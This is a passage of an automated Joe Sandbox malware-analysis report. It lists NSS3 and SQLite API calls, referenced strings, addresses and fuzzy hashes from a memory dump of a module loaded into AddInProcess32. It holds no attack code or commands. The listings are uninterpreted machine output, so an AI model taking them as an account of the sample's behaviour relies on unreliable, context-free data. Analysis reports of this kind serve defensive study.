                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Error_FindL_strcasecmpL_strncasecmpStringTag_isdigit
                                                                                      • String ID: $#$oid.
                                                                                      • API String ID: 1102519172-3957058170
                                                                                      • Opcode ID: 4117d281f4c441f02e7a0e8bcfb9b97ec3b38e8a3c70a70f59c198df5c9f6ee1
                                                                                      • Instruction ID: 70ab0fee602799f023a8f60b765cdea5e84346fe122d99e8a3b6db3fad8d9d9e
                                                                                      • Opcode Fuzzy Hash: 4117d281f4c441f02e7a0e8bcfb9b97ec3b38e8a3c70a70f59c198df5c9f6ee1
                                                                                      • Instruction Fuzzy Hash: 4991A4B19042189BDB21DF64CC80BEDB7B9AB49318F5502DAD709E7641F730BA84CF69
                                                                                      APIs
                                                                                      • sqlite3_release_memory.NSS3(PR_Select(),PR_Poll()), ref: 6CCCBC7B
                                                                                      • PR_Sleep.NSS3(?), ref: 6CCCBCDB
                                                                                      • PR_Calloc.NSS3(00000014,00000008), ref: 6CCCBCED
                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CCCBE1C
                                                                                        • Part of subcall function 6CCCBEEF: PR_Realloc.NSS3(?,-00000040,?,?,?,00000008,00000008,?,6CCCBD10,?,00000001,00000000), ref: 6CCCBF2F
                                                                                        • Part of subcall function 6CCCBEEF: memset.VCRUNTIME140(?,00000000,000000A0,?,?,?,00000008,00000008,?,6CCCBD10,?,00000001,00000000), ref: 6CCCBF49
                                                                                      • PR_Poll.NSS3(00000000,00000000,?), ref: 6CCCBD66
                                                                                      • PR_SetError.NSS3(FFFFE891,00000000), ref: 6CCCBE09
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$CallocPollReallocSleepmemsetsqlite3_release_memory
                                                                                      • String ID: PR_Poll()$PR_Select()
                                                                                      • API String ID: 2185953273-3034026096
                                                                                      • Opcode ID: 07d5eac8f197432b67495c13b47a98e8aaac2baa0e8c4f527c032979ee08c4be
                                                                                      • Instruction ID: ebce391a73d0fa859d3b088a7b600ba59e44769d3aa38c43d0a27e9b9f2c39eb
                                                                                      • Opcode Fuzzy Hash: 07d5eac8f197432b67495c13b47a98e8aaac2baa0e8c4f527c032979ee08c4be
                                                                                      • Instruction Fuzzy Hash: C151D731B066025FDB10CFA8C9A0BA677E5BF45718F2042ACEA64CB794FB30D854C792
                                                                                      APIs
                                                                                      • PR_LogPrint.NSS3(PRTRACE: CreateTrace: Qname: %s, RName: %s,?,?), ref: 6CCD897E
                                                                                      • PR_Lock.NSS3 ref: 6CCD898C
                                                                                      • PR_Calloc.NSS3(00000001,00000030), ref: 6CCD89D7
                                                                                      • PR_Calloc.NSS3(00000001,00000134), ref: 6CCD8A1F
                                                                                      • PR_NewLock.NSS3 ref: 6CCD8A51
                                                                                      • PR_Unlock.NSS3 ref: 6CCD8A7C
                                                                                      • PR_LogPrint.NSS3(PRTrace: Create: QName: %s %p, RName: %s %p,?,00000000,?,?), ref: 6CCD8A98
                                                                                        • Part of subcall function 6CCD952C: PR_NewLock.NSS3(6CCD8964), ref: 6CCD952C
                                                                                        • Part of subcall function 6CCD952C: PR_Lock.NSS3(00000000,6CCD8964), ref: 6CCD9537
                                                                                        • Part of subcall function 6CCD952C: PR_NewLogModule.NSS3(00000000,6CCD8964), ref: 6CCD9552
                                                                                        • Part of subcall function 6CCD952C: PR_NewLock.NSS3(00100000,00000000,6CCD8964), ref: 6CCD956C
                                                                                        • Part of subcall function 6CCD952C: PR_NewCondVar.NSS3(00000000,00100000,00000000,6CCD8964), ref: 6CCD9577
                                                                                        • Part of subcall function 6CCD952C: PR_Unlock.NSS3(00000000,00100000,00000000,6CCD8964), ref: 6CCD9587
                                                                                      Strings
                                                                                      • PRTrace: Create: QName: %s %p, RName: %s %p, xrefs: 6CCD8A93
                                                                                      • PRTRACE: CreateTrace: Qname: %s, RName: %s, xrefs: 6CCD8979
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lock$CallocPrintUnlock$CondModule
                                                                                      • String ID: PRTRACE: CreateTrace: Qname: %s, RName: %s$PRTrace: Create: QName: %s %p, RName: %s %p
                                                                                      • API String ID: 3212500477-632675026
                                                                                      • Opcode ID: 6bfe29535b9fcfb0e0241d4ec134e078e58c7d0dade2032caad900e558729433
                                                                                      • Instruction ID: b509761511fd740fa1d51d6855ed4da9a703d04c6f2e4881e0e42a7ac1dcedca
                                                                                      • Opcode Fuzzy Hash: 6bfe29535b9fcfb0e0241d4ec134e078e58c7d0dade2032caad900e558729433
                                                                                      • Instruction Fuzzy Hash: 244114756093019FDB028F29C840E82BBF9FF46328B55859EDAC987F11E732E408CB91
                                                                                      APIs
                                                                                        • Part of subcall function 6CC8B026: sqlite3_finalize.NSS3(?,?,?,?,6CC64B9C,?), ref: 6CC8B031
                                                                                        • Part of subcall function 6CC8B026: sqlite3_free.NSS3(?,?,?,?,6CC64B9C,?), ref: 6CC8B043
                                                                                      • sqlite3_value_text.NSS3(?), ref: 6CC64E71
                                                                                      • sqlite3_mprintf.NSS3(6CD51024,00000000), ref: 6CC64E81
                                                                                        • Part of subcall function 6CC63B3B: sqlite3_initialize.NSS3(?,6CC63A78,6CD51024,?,?), ref: 6CC63B3E
                                                                                      • sqlite3_prepare_v2.NSS3(?,00000000,000000FF,00000000,00000000), ref: 6CC64F2C
                                                                                      • sqlite3_free.NSS3(00000000,?,00000000,000000FF,00000000,00000000), ref: 6CC64F35
                                                                                      • sqlite3_errmsg.NSS3(?), ref: 6CC64F47
                                                                                      • sqlite3_mprintf.NSS3(6CD51024,00000000,?), ref: 6CC64F52
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_freesqlite3_mprintf$sqlite3_errmsgsqlite3_finalizesqlite3_initializesqlite3_prepare_v2sqlite3_value_text
                                                                                      • String ID: %Q.$=%Q$PRAGMA
                                                                                      • API String ID: 2253030684-2099833060
                                                                                      • Opcode ID: aaeb8c55f9898aa216009eed9dd40d6e21b2637fa6bd3c12bedc16c7f9f534e4
                                                                                      • Instruction ID: 83c7be367080c013e5c54d8b2353af6f4f35bddf7b5f1f345c9b141256aed436
                                                                                      • Opcode Fuzzy Hash: aaeb8c55f9898aa216009eed9dd40d6e21b2637fa6bd3c12bedc16c7f9f534e4
                                                                                      • Instruction Fuzzy Hash: 8C41A07290460AAFEF00CFA9E9C1DDAB7E8EF44318F20452AE514D7E50F731E9598B91
                                                                                      APIs
                                                                                      • sqlite3_malloc.NSS3(00000010), ref: 6CC69C6B
                                                                                        • Part of subcall function 6CC63C6C: sqlite3_initialize.NSS3(?,6CCB8B25,0000000A,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63C6F
                                                                                      • memcmp.VCRUNTIME140(remove_diacritics=1,?,?), ref: 6CC69CBC
                                                                                      • memcmp.VCRUNTIME140(tokenchars=,?,0000000B), ref: 6CC69D26
                                                                                      • memcmp.VCRUNTIME140(separators=,00000001,0000000B), ref: 6CC69D4C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                                                      • String ID: remove_diacritics=0$remove_diacritics=1$separators=$tokenchars=
                                                                                      • API String ID: 40721531-4153190982
                                                                                      • Opcode ID: afe306b6ed116e0c37b082cc60a9803fd12eb328d8a86a6d858df00184df7be9
                                                                                      • Instruction ID: 0fccf147def576fae2439ba00beecd77452efc9006ec19abf65590d5ffdc187a
                                                                                      • Opcode Fuzzy Hash: afe306b6ed116e0c37b082cc60a9803fd12eb328d8a86a6d858df00184df7be9
                                                                                      • Instruction Fuzzy Hash: 9531D6B6A042057FE7108FAACEC0B9AB3A8EF0534CF144565EA09C7E40F7709A058660
                                                                                      APIs
                                                                                        • Part of subcall function 6CD1F5A5: NSSUTIL_ArgIsBlank.NSS3(00000000,6CD51970,00000000,00000000,?,?,?,6CD1EFE1,slotParams,00000000,0000007B), ref: 6CD1F5D0
                                                                                        • Part of subcall function 6CD1F5A5: PR_smprintf.NSS3(%s=%c%s%c,00000000,00000000,00000000,00000000,slotParams,00000000), ref: 6CD1F64E
                                                                                        • Part of subcall function 6CD1F5A5: PR_smprintf.NSS3(%s=%s,00000000,00000000,slotParams,00000000), ref: 6CD1F662
                                                                                        • Part of subcall function 6CD1F5A5: PORT_Free_Util.NSS3(00000000), ref: 6CD1F67B
                                                                                      • PR_smprintf.NSS3(%s %s %s %s %s,00000000,00000000,00000000,00000000,00000000,config,00000000,00000022,00000000,00000000,00000000,00000000,?,6CD13CE7), ref: 6CD1EE5F
                                                                                        • Part of subcall function 6CD1F6F3: PR_smprintf_free.NSS3(6CD1F053,?,6CD1F053,6CD13E21), ref: 6CD1F706
                                                                                      • PR_smprintf.NSS3(%s %s %s %s,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,6CD13CE7), ref: 6CD1EE7F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: R_smprintf$BlankFree_R_smprintf_freeUtil
                                                                                      • String ID: %s %s %s %s$%s %s %s %s %s$NSS$config$library$name$parameters
                                                                                      • API String ID: 537608016-3997250588
                                                                                      • Opcode ID: 4cb83649288e130c62d722b6af4cc8112511b02c799731a10f787a09e7e9177e
                                                                                      • Instruction ID: 275317601245396f4dddca1594639d86c5e1fb1d75d9adeec53c8bac12c0f1ca
                                                                                      • Opcode Fuzzy Hash: 4cb83649288e130c62d722b6af4cc8112511b02c799731a10f787a09e7e9177e
                                                                                      • Instruction Fuzzy Hash: 9B119A72904109BBFB115FAAEC4AEEE3E6CEF85298F500410F90066E71E7714E6486F1
                                                                                      APIs
                                                                                      • PR_GetError.NSS3 ref: 6CD1FD83
                                                                                      • PR_GetOSError.NSS3 ref: 6CD1FD8A
                                                                                      • PR_ErrorToName.NSS3(00000000), ref: 6CD1FD92
                                                                                      • PR_fprintf.NSS3(?,%s: ,00000000), ref: 6CD1FDAB
                                                                                        • Part of subcall function 6CCCBFCB: PR_vfprintf.NSS3(?,?,?), ref: 6CCCBFD8
                                                                                      • PR_fprintf.NSS3(?, (%d)OUT OF RANGE, oserror = %d,00000000,00000000), ref: 6CD1FDC1
                                                                                      • PR_fprintf.NSS3(?,%s(%d), oserror = %d,00000000,00000000,00000000), ref: 6CD1FDD4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorR_fprintf$NameR_vfprintf
                                                                                      • String ID: (%d)OUT OF RANGE, oserror = %d$%s(%d), oserror = %d$%s:
                                                                                      • API String ID: 1985992602-1619349177
                                                                                      • Opcode ID: ce54d09c8bedb0182dce42f268b2d7d7020bf5f62d9368d189bf7cf0a192d512
                                                                                      • Instruction ID: c9c028e085d801769560c313e351168661f63a1ad338f97f1db59277014e869d
                                                                                      • Opcode Fuzzy Hash: ce54d09c8bedb0182dce42f268b2d7d7020bf5f62d9368d189bf7cf0a192d512
                                                                                      • Instruction Fuzzy Hash: 3AF08976A0520877EB103BA5EC90DDB3E289F411ECF054425FD0856F21FB32D959D6E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e8a2d569494f0a184240a35791a536e2c8af036293c2fd912589f8ff7e577de0
                                                                                      • Instruction ID: 356669c1e2d1837c25b2e5425d1d73f517eaf66dd525144a9c44458a9c5a8bc4
                                                                                      • Opcode Fuzzy Hash: e8a2d569494f0a184240a35791a536e2c8af036293c2fd912589f8ff7e577de0
                                                                                      • Instruction Fuzzy Hash: 07B1C07090C26AEFDB258F28E8807E9BBF4AB0A308F1605DAD59597971D770DAC1CB50
                                                                                      APIs
                                                                                      • CERT_CheckCertValidTimes.NSS3(00000000,00000000,00000001,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6CCE6D4A
                                                                                      • PORT_SetError_Util.NSS3(FFFFE05A,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6CCE6DFA
                                                                                      • PORT_SetError_Util.NSS3(FFFFE05B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6CCE6E2A
                                                                                      • PORT_SetError_Util.NSS3(FFFFE015,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6CCE6E69
                                                                                      • PK11_IsReadOnly.NSS3(00000000), ref: 6CCE6EC4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error_Util$CertCheckK11_OnlyReadTimesValid
                                                                                      • String ID:
                                                                                      • API String ID: 1531289107-0
                                                                                      • Opcode ID: a19a1eb90f8c5e96abb6a461fa09439f5933362b4cd39ffd1bfa717301b56641
                                                                                      • Instruction ID: 08a11398e875ea4a1f432b96f94afbe77c5404b86c18da28401cef6971d979a5
                                                                                      • Opcode Fuzzy Hash: a19a1eb90f8c5e96abb6a461fa09439f5933362b4cd39ffd1bfa717301b56641
                                                                                      • Instruction Fuzzy Hash: 2A512472E25A0D7AEB019A64CD41FEF36689F4A35CF100165FF14E6A91FB31DA2086B1
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(00000000,00000000,6CCE7550,000000FF,00000000,6CCE7560,00000000,?,6CCE7550,00000000,?), ref: 6CCE8DDD
                                                                                        • Part of subcall function 6CD1C8A6: PR_Lock.NSS3(?,?,?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?), ref: 6CD1C8BA
                                                                                        • Part of subcall function 6CD1C8A6: PR_Unlock.NSS3(?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000), ref: 6CD1C8C9
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000048,00000000,00000000,6CCE7550,000000FF,00000000,6CCE7560,00000000,?,6CCE7550,00000000,?), ref: 6CCE8DE8
                                                                                        • Part of subcall function 6CD1C92F: PORT_ArenaAlloc_Util.NSS3(00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C943
                                                                                        • Part of subcall function 6CD1C92F: memset.VCRUNTIME140(00000000,00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C954
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000000,6CCE7550,00000000,6CCE7550,000000FF,00000000,6CCE7560,00000000,?,6CCE7550,00000000,?), ref: 6CCE8DFE
                                                                                        • Part of subcall function 6CD1BB68: PORT_ArenaAlloc_Util.NSS3(?,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1BB8E
                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CD604B8,00000000,?,?,?,00000000,6CCE7550,000000FF,00000000,6CCE7560,00000000,?,6CCE7550,00000000), ref: 6CCE8E15
                                                                                        • Part of subcall function 6CD18A99: PORT_SetError_Util.NSS3(FFFFE08C,?,?,00000000), ref: 6CD18AE6
                                                                                      • PORT_SetError_Util.NSS3(FFFFE081,?,?,?,?,?,?,?,?,?,?,?,00000000,6CCE7550,000000FF,00000000), ref: 6CCE8E32
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_ArenaRelease_Util.NSS3(00000000,6CCE7550,00000000,6CCE7550,000000FF,00000000,6CCE7560,00000000,?,6CCE7550,00000000,?), ref: 6CCE8E3C
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000010,?,?,?,?,?,?,?,00000000,6CCE7550,000000FF,00000000,6CCE7560,00000000), ref: 6CCE8E9A
                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CD60528,-0000000C,?,?,?,?,?,?,?,00000000,6CCE7550,000000FF,00000000,6CCE7560), ref: 6CCE8EB4
                                                                                      • PT_FPrintStats.NSS3(00000000,6CCE7550,?,?,?,?,?,?,?,?,?,?,?,00000000,6CCE7550,000000FF), ref: 6CCE8EE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_$Item_$DecodeError_Quick$CopyErrorLockMark_PrintRelease_StatsUnlockmemset
                                                                                      • String ID:
                                                                                      • API String ID: 3342425249-0
                                                                                      • Opcode ID: b1e27f4a97ec56e4cb20bbd50d7630dbf3327296c5d5dd8bcdaed3523f83fe93
                                                                                      • Instruction ID: 920b48555e2ab1effb7aa529144816018a5e22814c63ff56c032e2a1b7194514
                                                                                      • Opcode Fuzzy Hash: b1e27f4a97ec56e4cb20bbd50d7630dbf3327296c5d5dd8bcdaed3523f83fe93
                                                                                      • Instruction Fuzzy Hash: 613147769092156F9B009FAD9C01EEE77A8EF4B318F100057E910ABF60F771DA05C765
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(000000A4,?,00000000,?,6CD23C4A,?,000000A4,?,?,?,?,?,?,00000000), ref: 6CD2481A
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,?,00000000,?,6CD23C4A,?,000000A4,?,?,?,?,?,?,00000000), ref: 6CD2482B
                                                                                      • PT_FPrintStats.NSS3(000000A4,00000000,?,000000A4,?,?,?,?,?,?,00000000), ref: 6CD248CB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$ArenaError_Mark_PrintStats
                                                                                      • String ID:
                                                                                      • API String ID: 562761491-0
                                                                                      • Opcode ID: 85928fa1072dbd00bffbb1848d78e8f1a577fa8be2be66606ba70ddb1fdb2674
                                                                                      • Instruction ID: ae6996ba08eef43624918abfa069e4d9badb1f7a7e70f1b9a457805f49d5c8d4
                                                                                      • Opcode Fuzzy Hash: 85928fa1072dbd00bffbb1848d78e8f1a577fa8be2be66606ba70ddb1fdb2674
                                                                                      • Instruction Fuzzy Hash: D621E73315C146AFF7095B79ED409A9F7A8EF8526C724013AEE04D5F74EF2AC91486A0
                                                                                      APIs
                                                                                      • PR_Init.NSS3 ref: 6CCC5E35
                                                                                      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 6CCC5E5F
                                                                                      • GetLastError.KERNEL32 ref: 6CCC5E69
                                                                                      • PR_SetError.NSS3(FFFFE896,00000000), ref: 6CCC5E75
                                                                                      • PR_AllocFileDesc.NSS3(?,6CD86FA0), ref: 6CCC5E8B
                                                                                      • CloseHandle.KERNEL32(?), ref: 6CCC5EA4
                                                                                      • CloseHandle.KERNEL32(?), ref: 6CCC5EA9
                                                                                      • PR_AllocFileDesc.NSS3(?,6CD86FA0), ref: 6CCC5EB1
                                                                                      • PR_Close.NSS3(?), ref: 6CCC5EC3
                                                                                      • CloseHandle.KERNEL32(?), ref: 6CCC5ECC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$Handle$AllocDescErrorFile$CreateInitLastPipe
                                                                                      • String ID:
                                                                                      • API String ID: 485330772-0
                                                                                      • Opcode ID: 21d542d71d0637b4dae3a973ed82f2b1544cc33704e73e494d8b9bcf2cf796fc
                                                                                      • Instruction ID: 81ce4fd1e983bc9a3808733daa9042eb60048b81b657d0922c11454ec17ed506
                                                                                      • Opcode Fuzzy Hash: 21d542d71d0637b4dae3a973ed82f2b1544cc33704e73e494d8b9bcf2cf796fc
                                                                                      • Instruction Fuzzy Hash: DC218635A18108EFEB00DFA9DC45D9EBBF8FF05368F20416AE540E7660EB31AD44DA52
                                                                                      APIs
                                                                                      • SECITEM_DupItem_Util.NSS3(6CCDDE2D,00000000,00000000,?,6CCDDE69,?,00000000), ref: 6CCDE85A
                                                                                        • Part of subcall function 6CD1BC44: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CCE34BD,?,6CCE34BD,?,?,?,?,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E), ref: 6CD1BC4C
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,00000000,00000000,?,6CCDDE69,?,00000000), ref: 6CCDE86B
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECITEM_DupItem_Util.NSS3(?,00000000,00000000,00000000,?,6CCDDE69,?,00000000), ref: 6CCDE877
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,00000000,00000000,00000000,?,6CCDDE69,?,00000000), ref: 6CCDE886
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,00000000,00000001,00000000,00000000,00000000,?,6CCDDE69,?,00000000), ref: 6CCDE890
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
